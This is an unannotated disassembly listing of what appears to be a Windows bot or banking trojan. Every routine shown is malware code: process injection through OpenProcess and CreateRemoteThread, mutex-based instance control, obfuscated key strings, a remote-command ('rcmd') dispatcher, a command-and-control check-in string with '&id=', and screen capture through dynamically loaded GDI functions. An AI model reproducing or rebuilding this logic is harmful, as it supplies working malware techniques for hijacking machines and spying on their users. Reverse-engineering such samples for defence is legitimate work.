sub_406D52 proc near ; CODE XREF: sub_4043A8+1A�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
push ebx
push esi
mov esi, [ebp+arg_14]
push edi
push esi
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_8]
call dword_40FC3C
push esi
push [ebp+arg_10]
mov ebx, eax
push [ebp+arg_C]
push [ebp+arg_8]
call dword_40FC38
mov edi, eax
test edi, edi
jnz short loc_406DB1
test ebx, ebx
jz short loc_406DB1
mov eax, [esi]
cmp word ptr [eax], 5A4Dh
jnz short loc_406DB1
push [ebp+arg_0]
call dword_40FE84 ; RtlEnterCriticalSection
push 0FFFFFFFFh
push [ebp+arg_4]
push dword ptr [esi]
call sub_406A70
add esp, 0Ch
push [ebp+arg_0]
call dword_40FE88 ; RtlLeaveCriticalSection
loc_406DB1: ; CODE XREF: sub_406D52+2F�j
; sub_406D52+33�j ...
mov eax, edi
pop edi
pop esi
pop ebx
pop ebp
retn
sub_406D52 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_406DB8 proc near ; CODE XREF: .text:004055B0�p
; .text:004055CD�p ...
var_1 = byte ptr -1
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
push ebx
push esi
mov esi, [ebp+arg_8]
xor ebx, ebx
cmp esi, ebx
mov [ebp+var_1], 1
jnz short loc_406DEC
cmp [ebp+arg_4], ebx
mov [ebp+var_1], bl
jz short loc_406DE8
push [ebp+arg_4]
push ebx
push 1F0FFFh
call dword_40FE34 ; OpenProcess
mov esi, eax
cmp esi, ebx
jnz short loc_406DEC
loc_406DE8: ; CODE XREF: sub_406DB8+19�j
xor al, al
jmp short loc_406E32
; ---------------------------------------------------------------------------
loc_406DEC: ; CODE XREF: sub_406DB8+11�j
; sub_406DB8+2E�j
push 1
push dword_40FCB0
mov [ebp+arg_4], ebx
push esi
call sub_4065F4
add esp, 0Ch
cmp eax, ebx
jz short loc_406E20
lea ecx, [ebp+arg_4]
push ecx
mov ecx, [ebp+arg_0]
push ebx
push ebx
add eax, ecx
push eax
push ebx
push ebx
push esi
call dword_40FDEC ; CreateRemoteThread
push eax
call dword_40FDAC ; CloseHandle
loc_406E20: ; CODE XREF: sub_406DB8+4A�j
cmp [ebp+var_1], bl
jnz short loc_406E2C
push esi
call dword_40FDAC ; CloseHandle
loc_406E2C: ; CODE XREF: sub_406DB8+6B�j
cmp [ebp+arg_4], ebx
setnz al
loc_406E32: ; CODE XREF: sub_406DB8+32�j
pop esi
pop ebx
leave
retn
sub_406DB8 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_406E36 proc near ; CODE XREF: sub_404222+D4�p
var_428 = dword ptr -428h
var_40C = dword ptr -40Ch
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 428h
push esi
push dword_40FCA4
mov [ebp+var_428], 428h
push 8
call dword_40FE14 ; CreateToolhelp32Snapshot
mov esi, eax
cmp esi, 0FFFFFFFFh
jz short loc_406E95
lea eax, [ebp+var_428]
push eax
push esi
call dword_40FE20 ; Module32FirstW
jmp short loc_406E91
; ---------------------------------------------------------------------------
loc_406E6F: ; CODE XREF: sub_406E36+5D�j
push [ebp+arg_4]
push [ebp+arg_0]
push [ebp+var_40C]
call sub_406A70
add esp, 0Ch
lea eax, [ebp+var_428]
push eax
push esi
call dword_40FE24 ; Module32NextW
loc_406E91: ; CODE XREF: sub_406E36+37�j
test eax, eax
jnz short loc_406E6F
loc_406E95: ; CODE XREF: sub_406E36+27�j
pop esi
leave
retn
sub_406E36 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_406E98 proc near ; CODE XREF: sub_408413+B6�p
var_418 = byte ptr -418h
var_210 = byte ptr -210h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 418h
push ebx
push esi
push edi
mov edi, [ebp+arg_0]
lea eax, [ebp+var_210]
push eax
push 1
push [ebp+arg_4]
push edi
call sub_409D8E
lea eax, [ebp+var_418]
push eax
push 2
push [ebp+arg_4]
push edi
call sub_409D8E
add esp, 20h
lea eax, [ebp+var_418]
push eax
xor ebx, ebx
push ebx
mov esi, 1F0001h
push esi
call dword_40FD80 ; OpenMutexW
cmp eax, ebx
jz short loc_406EF6
loc_406EE8: ; CODE XREF: sub_406E98+6F�j
push eax
call dword_40FDAC ; CloseHandle
xor al, al
loc_406EF1: ; CODE XREF: sub_406E98+AD�j
pop edi
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_406EF6: ; CODE XREF: sub_406E98+4E�j
lea eax, [ebp+var_210]
push eax
push ebx
push esi
call dword_40FD80 ; OpenMutexW
cmp eax, ebx
jnz short loc_406EE8
lea eax, [ebp+var_210]
push eax
push 1
push offset dword_40FD24
call dword_40FD7C ; CreateMutexW
mov [ebp+var_8], eax
push edi
mov eax, offset sub_404303
sub eax, dword_40FCB0
push ebx
push eax
call sub_406DB8
add esp, 0Ch
test al, al
jnz short loc_406F47
loc_406F3A: ; CODE XREF: sub_406E98+F2�j
push [ebp+var_8]
call dword_40FDAC ; CloseHandle
mov al, bl
jmp short loc_406EF1
; ---------------------------------------------------------------------------
loc_406F47: ; CODE XREF: sub_406E98+A0�j
mov [ebp+var_4], ebx
jmp short loc_406F70
; ---------------------------------------------------------------------------
loc_406F4C: ; CODE XREF: sub_406E98+E5�j
cmp [ebp+var_4], 103h
jnz short loc_406F88
lea eax, [ebp+var_418]
push eax
push ebx
push esi
call dword_40FD80 ; OpenMutexW
cmp eax, ebx
jnz short loc_406F81
push 14h
call dword_40FD68 ; Sleep
loc_406F70: ; CODE XREF: sub_406E98+B2�j
lea eax, [ebp+var_4]
push eax
push edi
call dword_40FE30 ; GetExitCodeProcess
test eax, eax
jnz short loc_406F4C
jmp short loc_406F88
; ---------------------------------------------------------------------------
loc_406F81: ; CODE XREF: sub_406E98+CE�j
push eax
call dword_40FDAC ; CloseHandle
loc_406F88: ; CODE XREF: sub_406E98+BB�j
; sub_406E98+E7�j
mov bl, 1
jmp short loc_406F3A
sub_406E98 endp
; =============== S U B R O U T I N E =======================================
sub_406F8C proc near ; CODE XREF: sub_407335+176�p
; .data:004189D1�p
; DATA XREF: ...
arg_4 = dword ptr 8
mov eax, [esp+arg_4]
push 1
push dword ptr [eax]
push offset aPanda2 ; "=-=-PaNdA!$2+)(*"
call sub_40B3E4
add esp, 0Ch
mov al, 1
retn 14h
sub_406F8C endp
; =============== S U B R O U T I N E =======================================
sub_406FA6 proc near ; CODE XREF: sub_406FA6+17�j
; DATA XREF: .data:0040F33C�o
arg_4 = dword ptr 8
mov eax, [esp+arg_4]
push 2
push dword ptr [eax]
push offset aPanda2 ; "=-=-PaNdA!$2+)(*"
call sub_40B1A0
add esp, 0Ch
test al, al
jnz short sub_406FA6
inc al
retn 14h
sub_406FA6 endp
; =============== S U B R O U T I N E =======================================
sub_406FC4 proc near ; DATA XREF: .data:0040F344�o
arg_4 = dword ptr 8
mov eax, [esp+arg_4]
push 1
push dword ptr [eax]
push offset a@hj01n_1@ ; "-!-@hj01N./1@};|"
call sub_40B3E4
add esp, 0Ch
mov al, 1
retn 14h
sub_406FC4 endp
; =============== S U B R O U T I N E =======================================
sub_406FDE proc near ; CODE XREF: sub_406FDE+17�j
; DATA XREF: .data:0040F34C�o
arg_4 = dword ptr 8
mov eax, [esp+arg_4]
push 2
push dword ptr [eax]
push offset a@hj01n_1@ ; "-!-@hj01N./1@};|"
call sub_40B1A0
add esp, 0Ch
test al, al
jnz short sub_406FDE
inc al
retn 14h
sub_406FDE endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_406FFC proc near ; DATA XREF: .data:0040F354�o
; .data:0040F35C�o
arg_0 = word ptr 8
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
cmp [ebp+arg_10], 0
jnz short loc_407009
xor al, al
jmp short loc_407024
; ---------------------------------------------------------------------------
loc_407009: ; CODE XREF: sub_406FFC+7�j
cmp [ebp+arg_0], 66h
push [ebp+arg_10]
push [ebp+arg_C]
jnz short loc_40701D
call sub_403F78
jmp short loc_407022
; ---------------------------------------------------------------------------
loc_40701D: ; CODE XREF: sub_406FFC+18�j
call sub_404034
loc_407022: ; CODE XREF: sub_406FFC+1F�j
pop ecx
pop ecx
loc_407024: ; CODE XREF: sub_406FFC+B�j
pop ebp
retn 14h
sub_406FFC endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_407028 proc near ; DATA XREF: .data:0040F364�o
var_660 = byte ptr -660h
var_458 = byte ptr -458h
var_42C = byte ptr -42Ch
var_208 = byte ptr -208h
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
mov eax, [ebp+arg_4]
sub esp, 660h
push esi
push 0FFFFFFFFh
push dword ptr [eax]
call sub_40A791
mov esi, eax
test esi, esi
pop ecx
pop ecx
jnz short loc_40704D
xor al, al
jmp loc_4070DC
; ---------------------------------------------------------------------------
loc_40704D: ; CODE XREF: sub_407028+1C�j
push 103h
lea eax, [ebp+var_208]
push eax
push esi
call dword_40FEB4 ; ExpandEnvironmentStringsW
push esi
call sub_409317
pop ecx
lea eax, [ebp+var_458]
push eax
lea eax, [ebp+var_208]
push eax
call dword_40FE94 ; FindFirstFileW
mov esi, eax
test esi, esi
jz short loc_4070DA
lea eax, [ebp+var_208]
push eax
call dword_40FC98
loc_40708E: ; CODE XREF: sub_407028+A9�j
test [ebp+var_458], 10h
jnz short loc_4070C1
lea eax, [ebp+var_42C]
push eax
lea eax, [ebp+var_208]
push eax
lea eax, [ebp+var_660]
push eax
call dword_40FC8C
lea eax, [ebp+var_660]
push eax
push eax
call sub_40BA83
pop ecx
pop ecx
loc_4070C1: ; CODE XREF: sub_407028+6D�j
lea eax, [ebp+var_458]
push eax
push esi
call dword_40FE98 ; FindNextFileW
test eax, eax
jnz short loc_40708E
push esi
call dword_40FE9C ; FindClose
loc_4070DA: ; CODE XREF: sub_407028+57�j
mov al, 1
loc_4070DC: ; CODE XREF: sub_407028+20�j
pop esi
leave
retn 14h
sub_407028 endp
; =============== S U B R O U T I N E =======================================
sub_4070E1 proc near ; DATA XREF: .data:0040F36C�o
var_4 = dword ptr -4
push offset a@hj01n_1@ ; "-!-@hj01N./1@};|"
call sub_40A530
mov [esp+4+var_4], offset aPanda2 ; "=-=-PaNdA!$2+)(*"
call sub_40A530
mov [esp+4+var_4], offset dword_401300
call sub_40A530
mov [esp+4+var_4], offset dword_401000
call sub_40A530
pop ecx
mov al, 1
retn 14h
sub_4070E1 endp
; =============== S U B R O U T I N E =======================================
sub_407115 proc near ; DATA XREF: .data:0040F374�o
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
xor eax, eax
cmp [esp+arg_8], eax
jbe short loc_407123
mov eax, [esp+arg_4]
mov eax, [eax]
loc_407123: ; CODE XREF: sub_407115+6�j
push eax
call sub_403956
pop ecx
retn 14h
sub_407115 endp
; =============== S U B R O U T I N E =======================================
sub_40712D proc near ; DATA XREF: .data:0040F384�o
arg_4 = dword ptr 8
mov eax, [esp+arg_4]
push esi
push 0FFFFFFFFh
push dword ptr [eax]
call sub_40A791
mov esi, eax
test esi, esi
pop ecx
pop ecx
jz short loc_40715E
cmp word ptr [esi], 0
jnz short loc_40714C
or eax, 0FFFFFFFFh
loc_40714C: ; CODE XREF: sub_40712D+1A�j
push eax
call sub_40AC72
push esi
call sub_409317
pop ecx
pop ecx
mov al, 1
jmp short loc_407160
; ---------------------------------------------------------------------------
loc_40715E: ; CODE XREF: sub_40712D+14�j
xor al, al
loc_407160: ; CODE XREF: sub_40712D+2F�j
pop esi
retn 14h
sub_40712D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_407164 proc near ; DATA XREF: .data:0040F3A4�o
; .data:0040F3AC�o ...
var_20C = byte ptr -20Ch
var_1 = byte ptr -1
arg_0 = word ptr 8
arg_4 = dword ptr 0Ch
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
sub esp, 20Ch
cmp [ebp+arg_0], 45h
push ebx
push esi
push edi
mov [ebp+var_1], 0
jz short loc_4071B0
cmp [ebp+arg_0], 46h
jz short loc_4071B0
mov eax, [ebp+arg_4]
push 0FFFFFFFFh
push dword ptr [eax]
call sub_40A791
pop ecx
pop ecx
mov esi, eax
push 104h
lea eax, [ebp+var_20C]
push eax
push esi
call dword_40FEB4 ; ExpandEnvironmentStringsW
push esi
mov edi, eax
call sub_409317
pop ecx
jmp short loc_40720C
; ---------------------------------------------------------------------------
loc_4071B0: ; CODE XREF: sub_407164+15�j
; sub_407164+1C�j
lea eax, [ebp+var_20C]
push eax
call sub_409DD4
pop ecx
lea eax, [ebp+var_20C]
push eax
call dword_40FD90 ; lstrlenW
mov edi, eax
inc edi
xor bl, bl
loc_4071CF: ; CODE XREF: sub_407164+A6�j
push dword_40FAB8
mov eax, [ebp+arg_4]
push dword ptr [eax]
lea eax, [ebp+var_20C]
push eax
push dword_40FABC
call sub_405DBF
add esp, 10h
neg al
sbb al, al
inc al
mov [ebp+var_1], al
jz short loc_40720C
push 3E8h
call dword_40FD68 ; Sleep
inc bl
cmp bl, 0Ah
jb short loc_4071CF
loc_40720C: ; CODE XREF: sub_407164+4A�j
; sub_407164+94�j
test edi, edi
jz loc_407298
cmp [ebp+var_1], 0
jnz short loc_407298
mov eax, [ebp+arg_10]
add eax, edi
lea eax, [eax+eax+14h]
push eax
call sub_4092F9
mov esi, eax
lea ebx, [edi+edi]
push ebx
lea eax, [ebp+var_20C]
push eax
lea eax, [esi+2]
push eax
mov word ptr [esi], 22h
call sub_409331
lea eax, [ebx+esi]
xor ebx, ebx
add esp, 10h
cmp [ebp+arg_10], ebx
mov word ptr [eax], 22h
jz short loc_407272
push [ebp+arg_10]
mov word ptr [eax+2], 20h
lea eax, [esi+edi*2+4]
push eax
push [ebp+arg_10]
push [ebp+arg_C]
push ebx
push ebx
call dword_40FE60 ; MultiByteToWideChar
loc_407272: ; CODE XREF: sub_407164+F0�j
cmp [ebp+arg_0], 45h
jz short loc_407284
cmp [ebp+arg_0], 47h
jz short loc_407284
xor al, al
jmp short loc_407287
; ---------------------------------------------------------------------------
loc_407284: ; CODE XREF: sub_407164+113�j
; sub_407164+11A�j
xor eax, eax
inc eax
loc_407287: ; CODE XREF: sub_407164+11E�j
push esi
push ebx
push eax
call sub_40B046
push esi
call sub_409317
add esp, 10h
loc_407298: ; CODE XREF: sub_407164+AA�j
; sub_407164+B4�j
xor eax, eax
cmp [ebp+var_1], al
pop edi
pop esi
setz al
pop ebx
leave
retn 14h
sub_407164 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4072A7 proc near ; DATA XREF: sub_407335+1C1�o
; .data:00418A1C�o
var_10 = byte ptr -10h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
mov eax, [ebp+arg_8]
and dword ptr [eax], 0
mov eax, [ebp+arg_C]
and dword ptr [eax], 0
sub esp, 10h
push esi
mov esi, [ebp+arg_0]
mov al, [esi]
mov cl, al
inc cl
test al, al
mov [esi], cl
jbe short loc_4072CD
xor al, al
jmp short loc_407330
; ---------------------------------------------------------------------------
loc_4072CD: ; CODE XREF: sub_4072A7+20�j
push edi
push 2
push offset a3 ; "3="
push [ebp+arg_4]
mov byte ptr [esi+8], 1
call sub_40934F
add esp, 0Ch
push dword_40FB2C
mov edi, eax
call dword_40FD94 ; lstrlenA
push eax
push dword_40FB2C
push edi
call sub_40934F
push 4
push offset aId ; "&id="
push eax
call sub_40934F
mov edi, eax
push 0Ah
lea eax, [ebp+var_10]
push eax
push dword ptr [esi+4]
call sub_408F25
push eax
lea eax, [ebp+var_10]
push eax
push edi
call sub_40934F
add esp, 30h
mov byte ptr [eax], 0
mov al, 1
pop edi
loc_407330: ; CODE XREF: sub_4072A7+24�j
pop esi
leave
retn 10h
sub_4072A7 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_407335 proc near ; DATA XREF: sub_4088F1+A3�o
; .data:00419EBA�o
var_38 = byte ptr -38h
var_34 = byte ptr -34h
var_28 = byte ptr -28h
var_24 = dword ptr -24h
var_20 = byte ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_2 = byte ptr -2
var_1 = byte ptr -1
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 38h
push ebx
push esi
push edi
push 4
lea eax, [ebp+var_38]
push offset aRcmd ; "rcmd"
xor bl, bl
push eax
mov [ebp+var_2], bl
call sub_409331
mov esi, [ebp+arg_0]
push 4
lea eax, [ebp+var_34]
push esi
push eax
call sub_409331
lea eax, [ebp+var_38]
push 8
push eax
push eax
call sub_40A1D3
lea eax, [ebp+var_38]
push 0
push eax
call sub_40A476
add esp, 2Ch
test eax, eax
jnz loc_4074DA
mov eax, [esi+4]
mov edi, [esi+8]
add edi, eax
cmp eax, edi
mov [ebp+var_1C], edi
jnb loc_4074DA
loc_407397: ; CODE XREF: sub_407335+19B�j
test bl, bl
jnz loc_40752D
cmp byte ptr [eax], 0Ah
mov ecx, eax
jmp short loc_4073AE
; ---------------------------------------------------------------------------
loc_4073A6: ; CODE XREF: sub_407335+7C�j
cmp ecx, edi
jnb short loc_4073B3
inc ecx
cmp byte ptr [ecx], 0Ah
loc_4073AE: ; CODE XREF: sub_407335+6F�j
mov [ebp+var_C], ecx
jnz short loc_4073A6
loc_4073B3: ; CODE XREF: sub_407335+73�j
lea edx, [ebp+var_8]
push edx
lea edx, [ebp+var_14]
push edx
push ecx
push eax
call sub_409090
add esp, 10h
test al, al
jz loc_4074C7
mov eax, [ebp+var_8]
inc eax
mov [ebp+var_8], eax
sub eax, [ebp+var_14]
mov [ebp+var_1], 0
mov esi, eax
loc_4073DD: ; CODE XREF: sub_407335+D6�j
movzx eax, [ebp+var_1]
movzx eax, word_40F330[eax*8]
mov ecx, dword_40FB34
push 0FFFFFFFFh
push esi
push dword ptr [ecx+eax*4]
push [ebp+var_14]
call sub_408F6D
add esp, 10h
test eax, eax
jz short loc_407412
inc [ebp+var_1]
cmp [ebp+var_1], 12h
jb short loc_4073DD
jmp loc_4074C7
; ---------------------------------------------------------------------------
loc_407412: ; CODE XREF: sub_407335+CD�j
movzx esi, [ebp+var_1]
shl esi, 3
movzx eax, word_40F330[esi]
cmp ax, 3Eh
jnz short loc_40742F
mov [ebp+var_2], 1
jmp loc_4074C7
; ---------------------------------------------------------------------------
loc_40742F: ; CODE XREF: sub_407335+EF�j
cmp ax, 44h
jnz short loc_40743E
mov [ebp+var_2], 2
jmp loc_4074C7
; ---------------------------------------------------------------------------
loc_40743E: ; CODE XREF: sub_407335+FE�j
cmp ax, 3Ah
jnz short loc_40744A
mov [ebp+var_2], 3
jmp short loc_4074C7
; ---------------------------------------------------------------------------
loc_40744A: ; CODE XREF: sub_407335+10D�j
cmp ax, 3Bh
jnz short loc_407456
mov [ebp+var_2], 4
jmp short loc_4074C7
; ---------------------------------------------------------------------------
loc_407456: ; CODE XREF: sub_407335+119�j
mov al, byte_40F333[esi]
mov ecx, [ebp+var_8]
xor edi, edi
test al, al
mov [ebp+var_18], ecx
mov [ebp+var_10], edi
jbe short loc_407485
movzx eax, al
push eax
lea eax, [ebp+var_18]
push eax
lea eax, [ebp+var_10]
push eax
push [ebp+var_C]
push ecx
call sub_40B231
add esp, 14h
mov edi, eax
loc_407485: ; CODE XREF: sub_407335+134�j
movzx eax, byte_40F332[esi]
cmp edi, eax
jnb short loc_407494
mov bl, 1
jmp short loc_4074B9
; ---------------------------------------------------------------------------
loc_407494: ; CODE XREF: sub_407335+159�j
mov eax, [ebp+var_C]
sub eax, [ebp+var_8]
inc eax
push eax
push [ebp+var_18]
movzx eax, word_40F330[esi]
push edi
push [ebp+var_10]
push eax
call off_40F334[esi]
mov bl, al
neg bl
sbb bl, bl
inc bl
loc_4074B9: ; CODE XREF: sub_407335+15D�j
push edi
push [ebp+var_10]
call sub_4093AC
mov edi, [ebp+var_1C]
pop ecx
pop ecx
loc_4074C7: ; CODE XREF: sub_407335+92�j
; sub_407335+D8�j ...
mov eax, [ebp+var_C]
mov esi, [ebp+arg_0]
inc eax
cmp eax, edi
jb loc_407397
test bl, bl
jnz short loc_40752D
loc_4074DA: ; CODE XREF: sub_407335+49�j
; sub_407335+5C�j
push 4
lea eax, [ebp+var_38]
push esi
push eax
call sub_40A4C3
add esp, 0Ch
xor bl, bl
loc_4074EB: ; CODE XREF: sub_407335+1F6�j
mov eax, [esi]
mov [ebp+var_24], eax
lea eax, [ebp+var_28]
push eax
push 0
push offset sub_4072A7
push dword_40FABC
mov [ebp+var_28], 0
mov [ebp+var_20], 0
call sub_4063D8
add esp, 10h
test al, al
jz short loc_40751B
cmp [ebp+var_20], 0
jnz short loc_40752D
loc_40751B: ; CODE XREF: sub_407335+1DE�j
push 3E8h
call dword_40FD68 ; Sleep
inc bl
cmp bl, 0Ah
jb short loc_4074EB
loc_40752D: ; CODE XREF: sub_407335+64�j
; sub_407335+1A3�j ...
mov al, [ebp+var_2]
cmp al, 1
jz short loc_407553
cmp al, 2
jnz short loc_40753F
call sub_40A0CC
jmp short loc_407553
; ---------------------------------------------------------------------------
loc_40753F: ; CODE XREF: sub_407335+201�j
cmp al, 3
jnz short loc_407547
push 1
jmp short loc_40754D
; ---------------------------------------------------------------------------
loc_407547: ; CODE XREF: sub_407335+20C�j
cmp al, 4
jnz short loc_407553
push 0
loc_40754D: ; CODE XREF: sub_407335+210�j
call sub_40A377
pop ecx
loc_407553: ; CODE XREF: sub_407335+1FD�j
; sub_407335+208�j ...
push dword ptr [esi+4]
call sub_409317
push esi
call sub_409317
dec dword_40FAB4
pop ecx
pop ecx
pop edi
pop esi
pop ebx
leave
retn 4
sub_407335 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame fpd=6Ch
sub_407570 proc near ; CODE XREF: sub_4048AF+4D�p
; sub_408088+117�p
var_B0 = byte ptr -0B0h
var_A0 = byte ptr -0A0h
var_9C = dword ptr -9Ch
var_98 = dword ptr -98h
var_8C = dword ptr -8Ch
var_88 = dword ptr -88h
var_84 = dword ptr -84h
var_80 = dword ptr -80h
var_7C = dword ptr -7Ch
var_78 = byte ptr -78h
var_68 = dword ptr -68h
var_64 = dword ptr -64h
var_60 = dword ptr -60h
var_5C = dword ptr -5Ch
var_58 = dword ptr -58h
var_54 = dword ptr -54h
var_50 = dword ptr -50h
var_4C = dword ptr -4Ch
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = word ptr 10h
push ebp
lea ebp, [esp-6Ch]
sub esp, 0B0h
mov eax, dword_40FB34
push esi
push edi
push dword ptr [eax+98h]
call dword_40FD08 ; LoadLibraryA
mov edi, eax
mov eax, dword_40FB34
push dword ptr [eax+0A8h]
push edi
call dword_40FD04 ; GetProcAddress
mov [ebp+6Ch+var_14], eax
mov eax, dword_40FB34
push dword ptr [eax+0ACh]
push edi
call dword_40FD04 ; GetProcAddress
mov [ebp+6Ch+var_44], eax
mov eax, dword_40FB34
push dword ptr [eax+0B0h]
push edi
call dword_40FD04 ; GetProcAddress
mov [ebp+6Ch+var_40], eax
mov eax, dword_40FB34
push dword ptr [eax+0B4h]
push edi
call dword_40FD04 ; GetProcAddress
mov [ebp+6Ch+var_2C], eax
mov eax, dword_40FB34
push dword ptr [eax+0B8h]
push edi
call dword_40FD04 ; GetProcAddress
mov [ebp+6Ch+var_4C], eax
mov eax, dword_40FB34
push dword ptr [eax+0BCh]
push edi
call dword_40FD04 ; GetProcAddress
mov [ebp+6Ch+var_38], eax
mov eax, dword_40FB34
push dword ptr [eax+0C0h]
push edi
call dword_40FD04 ; GetProcAddress
xor esi, esi
cmp edi, esi
mov [ebp+6Ch+var_58], eax
jz loc_407A2C
cmp [ebp+6Ch+var_14], esi
jz loc_407A2C
cmp [ebp+6Ch+var_44], esi
jz loc_407A2C
cmp [ebp+6Ch+var_40], esi
jz loc_407A2C
cmp [ebp+6Ch+var_2C], esi
jz loc_407A2C
cmp [ebp+6Ch+var_4C], esi
jz loc_407A2C
cmp [ebp+6Ch+var_38], esi
jz loc_407A2C
cmp eax, esi
jz loc_407A2C
mov eax, dword_40FB34
push dword ptr [eax+9Ch]
call dword_40FD08 ; LoadLibraryA
mov edi, eax
mov eax, dword_40FB34
push dword ptr [eax+0C4h]
push edi
call dword_40FD04 ; GetProcAddress
cmp edi, esi
mov [ebp+6Ch+var_50], eax
jz loc_407A2C
cmp eax, esi
jz loc_407A2C
mov eax, dword_40FB34
push dword ptr [eax+0A0h]
call dword_40FD08 ; LoadLibraryA
mov edi, eax
mov eax, dword_40FB34
push dword ptr [eax+0C8h]
push edi
call dword_40FD04 ; GetProcAddress
mov [ebp+6Ch+var_C], eax
mov eax, dword_40FB34
push dword ptr [eax+0CCh]
push edi
call dword_40FD04 ; GetProcAddress
mov [ebp+6Ch+var_18], eax
mov eax, dword_40FB34
push dword ptr [eax+0D0h]
push edi
call dword_40FD04 ; GetProcAddress
mov [ebp+6Ch+var_10], eax
mov eax, dword_40FB34
push dword ptr [eax+0D4h]
push edi
call dword_40FD04 ; GetProcAddress
mov [ebp+6Ch+var_8], eax
mov eax, dword_40FB34
push dword ptr [eax+0D8h]
push edi
call dword_40FD04 ; GetProcAddress
mov [ebp+6Ch+var_28], eax
mov eax, dword_40FB34
push dword ptr [eax+0DCh]
push edi
call dword_40FD04 ; GetProcAddress
mov [ebp+6Ch+var_48], eax
mov eax, dword_40FB34
push dword ptr [eax+0E0h]
push edi
call dword_40FD04 ; GetProcAddress
mov [ebp+6Ch+var_34], eax
mov eax, dword_40FB34
push dword ptr [eax+0E4h]
push edi
call dword_40FD04 ; GetProcAddress
cmp edi, esi
mov [ebp+6Ch+var_3C], eax
jz loc_407A2C
cmp [ebp+6Ch+var_C], esi
jz loc_407A2C
cmp [ebp+6Ch+var_18], esi
jz loc_407A2C
cmp [ebp+6Ch+var_10], esi
jz loc_407A2C
cmp [ebp+6Ch+var_8], esi
jz loc_407A2C
cmp [ebp+6Ch+var_28], esi
jz loc_407A2C
cmp [ebp+6Ch+var_48], esi
jz loc_407A2C
cmp [ebp+6Ch+var_34], esi
jz loc_407A2C
cmp eax, esi
jz loc_407A2C
push ebx
mov bx, [ebp+6Ch+arg_8]
cmp bx, si
mov [ebp+6Ch+var_1C], esi
mov [ebp+6Ch+var_8C], 1
mov [ebp+6Ch+var_88], esi
mov [ebp+6Ch+var_84], esi
mov [ebp+6Ch+var_80], esi
jnz short loc_4077D7
call sub_40A062
test al, al
jz loc_407A26
loc_4077D7: ; CODE XREF: sub_407570+258�j
push esi
lea eax, [ebp+6Ch+var_8C]
push eax
lea eax, [ebp+6Ch+var_54]
push eax
call [ebp+6Ch+var_14]
test eax, eax
jnz loc_407A26
mov eax, dword_40FB34
push esi
push esi
push esi
push dword ptr [eax+0A4h]
call [ebp+6Ch+var_C]
push eax
mov [ebp+6Ch+var_C], eax
call [ebp+6Ch+var_18]
push 7F00h
push esi
mov [ebp+6Ch+var_18], eax
mov [ebp+6Ch+var_20], esi
mov [ebp+6Ch+var_24], esi
call dword_40FB1C
lea ecx, [ebp+6Ch+var_A0]
push ecx
push eax
mov [ebp+6Ch+var_14], eax
call dword_40FB28
lea eax, [ebp+6Ch+var_24]
push eax
call dword_40FB20
cmp bx, si
jz short loc_40783D
movzx edi, bx
mov [ebp+6Ch+var_4], edi
jmp short loc_407852
; ---------------------------------------------------------------------------
loc_40783D: ; CODE XREF: sub_407570+2C3�j
push 8
push [ebp+6Ch+var_C]
call [ebp+6Ch+var_10]
push 0Ah
push [ebp+6Ch+var_C]
mov edi, eax
call [ebp+6Ch+var_10]
mov [ebp+6Ch+var_4], eax
loc_407852: ; CODE XREF: sub_407570+2CB�j
push [ebp+6Ch+var_4]
push edi
push [ebp+6Ch+var_C]
call [ebp+6Ch+var_8]
cmp eax, esi
mov [ebp+6Ch+var_30], eax
jz loc_407A14
push eax
push [ebp+6Ch+var_18]
call [ebp+6Ch+var_28]
mov [ebp+6Ch+var_5C], eax
xor eax, eax
xor ecx, ecx
cmp bx, si
jz short loc_40788F
mov eax, [ebp+6Ch+var_24]
mov ecx, [ebp+6Ch+var_20]
movzx edx, bx
shr edx, 1
sub eax, edx
sub [ebp+6Ch+var_24], eax
sub ecx, edx
sub [ebp+6Ch+var_20], ecx
loc_40788F: ; CODE XREF: sub_407570+308�j
push 40CC0020h
push ecx
push eax
push [ebp+6Ch+var_C]
push [ebp+6Ch+var_4]
push edi
push esi
push esi
push [ebp+6Ch+var_18]
call [ebp+6Ch+var_48]
push [ebp+6Ch+var_14]
